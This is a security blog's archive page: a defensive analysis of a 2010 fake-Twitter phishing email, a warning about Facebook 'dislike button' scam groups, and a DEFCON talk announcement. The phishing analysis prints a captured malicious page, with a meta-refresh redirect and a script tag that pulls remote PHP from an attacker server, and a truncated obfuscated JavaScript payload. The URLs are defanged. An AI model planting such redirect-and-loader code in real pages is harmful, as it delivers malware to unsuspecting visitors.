Tag Archives: Malware

Interesting New Twitter Phish Can Lead to Bad Places

Filed under Malware, Social Networks
Tagged as , , , ,

I’ve had several fake emails that initially look like they come from Twitter in my email recently.  I didn’t think anything of it until several of my friends forwarded me the same type of emails.  This suggests two things.  One, that these emails are starting to hit a larger audience.  Or two, they are targeting just my friends and I which is totally possible. 🙂 Anyway, here is a quick bit of analysis of one of these emails.  I found some interesting things when I investigated the website linked in the fake email.  The link in this particular could have done more damage if it wasn’t for some crappy attacker code.  Read on!

The Email
The following screen shot shows you what the email looks like.  It seems to come from Twitter but you will notice that there are some interesting clues that tell you this isn’t real.  First, the Twitter account mentioned is just the first part of the email address this was sent to.  This may or may not be your Twitter ID.  Second, check out the “Britney Spears home video feedback” subject line and “Antidepressants for your bed vigor” bold red in the message body.  Yep.  All the signs that this isn’t from Twitter.  Ok, nothing to see here right?

The Link
When you look at the source of the email, the link actually goes to “hxxp://”. If you do click on this link several things happen:

An HTML page is loaded which redirects you to a shady Russian software site.  This site (software-oemdigital.ru) has a ton of phisy looking domains that were assigned to it since 6/11/2010.  The HTML file also loads a script which runs a PHP file on another server.  Let’s take a look at the response:

HTTP/1.0 200 OK
Connection: close
Content-Length: 250
Content-Type: text/html
Date: Wed, 23 Jun 2010 15:09:53 GMT
Last-Modified: Wed, 23 Jun 2010 08:30:01 GMT
Server: IdeaWebServer/v0.70

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<META HTTP-EQUIV=”refresh” CONTENT=”0;URL=hxxp://software-oemdigital.ru”>

</head></html><script src=hxxp://eurolisting.net/Cgi-bin/markprint.php ></script>

The Russian software site loads as normal but something else is going on in the background from eurolisting.net and that PHP file.  Here is the response:

HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Jun 2010 17:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1287414902; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/javascript

// <script>
function cxx(wcH){return wcH.replace(/%/g,”).replace(/[‘ow:Y]/g,fUp)}
cPH7j=’d:6fcY75meY6et.Y77rio74w65(Y22o3cdiv stylew3d:5cY22pw6fsitio6fnY3aaw62so6fl:75o74Y65o3b lefto3a:2d1000pxY3bw20tY6fp:3aw2d10w300pxw3bo5cw22:3ew22Y29w3b:66unctiY6fn :6973(a)o7bdY6fcu:6deY6et.w77rw69te(:22:3cifrao6d:65w20srcw3do5co22httw70Y3ao2f <SNIP>

All of the stuff following the script tag is obfuscated JavaScript.  I cut most of it out as it is quite lengthy.  Running this through jsunpack (a JavaScript unpacker) the script tries to load several things including some VBScript that seems to check for system properties, if you are running Firefox and if you have Java and/or Flash enabled as well as what seems to be a check for Adobe Reader plug-ins.  You can check out the script and the unpacked version over at the jsunpack site.

Now this is where it gets interesting.  In Internet Explorer the PHP file seems to generate a request to a URI that doesn’t exist: hxxp://, it 404’s.  You can also see this in the Wireshark capture below:

In Firefox it’s a different story.  The Russian software site still loads and something else attempts to get requested:


This site will lead to some fun “fake AV” which prompts you to download a “setup.exe” file.

You probably don’t want to run that file.  The good news is that if you have the latest version of Firefox it will note this as a reported web forgery and tries to prevent you from going there.  One problem I see is that if you are running an older version of Firefox you might not get this notification.  I haven’t tested this with other browsers but your results may vary.

What does this all mean?  Well of course don’t click on shady emails like this.  You know better right?  Also, don’t think that because you use Firefox you are safe from attacks like these!  Attackers are catching on and I would suspect we will see more attacks targeting multiple browsers besides IE.  Wait, too late isn’t it?  Special thanks to Greg and Tyler for providing intel about these domains and some of the analysis.

Beware of Evil Facebook Groups

Filed under Social Networks
Tagged as , , , , ,

Some of my Facebook friends are probably wondering why I would fall into the trap of the magical “dislike button” hype that seems to be sweeping across Facebook right now.  In a little social experiment and hopefully an awareness exercise for some of my non-security friends I created a Facebook group based off of similar ones I have seen called The REAL Dislike Button™ is Finally Here! Add it Now!.  The group is harmless even if it looks like there is scary JavaScript code in the instructions to “turn your friends blue”.  If you click on the link it takes you to one of my favorite YouTube video’s.  🙂

The point is that these fake groups are targeting Facebook users thinking that Facebook has these new “features” like a dislike button and even ones like “see who viewed your profile”.  Folks, these techniques and/or modifications to Facebook don’t exist.  Sorry.  Just in the last week I have seen more and more of my Facebook friends sharing links to these groups.  Almost all of the groups I have looked at that were being shared lead to very bad places which I will demonstrate below.

Example #1 – The Typical “Get the DISLIKE BUTTON” Scam
In this example we have one of *many* groups that promise you the uber magic secret “dislike” button if you just join the group, invite your friends to do the same and follow some strange link off to Neverland.  This group has 1,162,238 members.  I wish I was making that number up.

The first thing you will notice is that there is a link to a Facebook profile they want you to friend.  That profile was deleted (your first clue).  Next, they want you to check out a link in Step 5.  That link sends you here:

Which will eventually install some nasty adware/spyware on your Windows machine called Adware.Mywebsearch.DV.  It’s not easy to get rid of.

In a similar group like the one above with a mere 697,375 members the last link takes you to this:

If you go through with entering in your cell phone number and getting the confirmation code per the instructions you have just signed up for a monthly charge to your cell phone account to the tune of $9.99 per month.  The monthly charge details is in the very tiny text you can hardly read.  Nice.  But wait, if you were smart enough to try and close the quiz window, you get this pop-up:

Really?  Hopefully you don’t fall for that one even though it shows your real city.

Example #2 – The Typical “See everyone who viewed your profile” Scam

This is one of my favorites as this is another impossible feat of Facebook technology.  Here is what the screen shot look like:

Note the PhotoShop job on the notification window showing who has “viewed” your profile.  Clicking on the bit.ly link leads you to another quiz application or adware/spyware or other forms of dangerous malware.  Don’t worry, there are *lots* of these groups out there. Good times.

So the lesson here is…don’t click on anything in these groups that tempt you with magical Facebook powers!  If it seems too good to be true, it probably is!

Social Zombies: Your Friends Want To Eat Your Brains Video from DEFCON Posted

Filed under General Security
Tagged as , , , , , , , , , , ,

The video from the talk Kevin Johnson and I did at DEFCON 17 called “Social Zombies: Your Friends Want To Eat Your Brains” is now up on Vimeo.  If you missed us at DEFCON Kevin and I will be presenting an updated version at OWASP AppSec DC in November.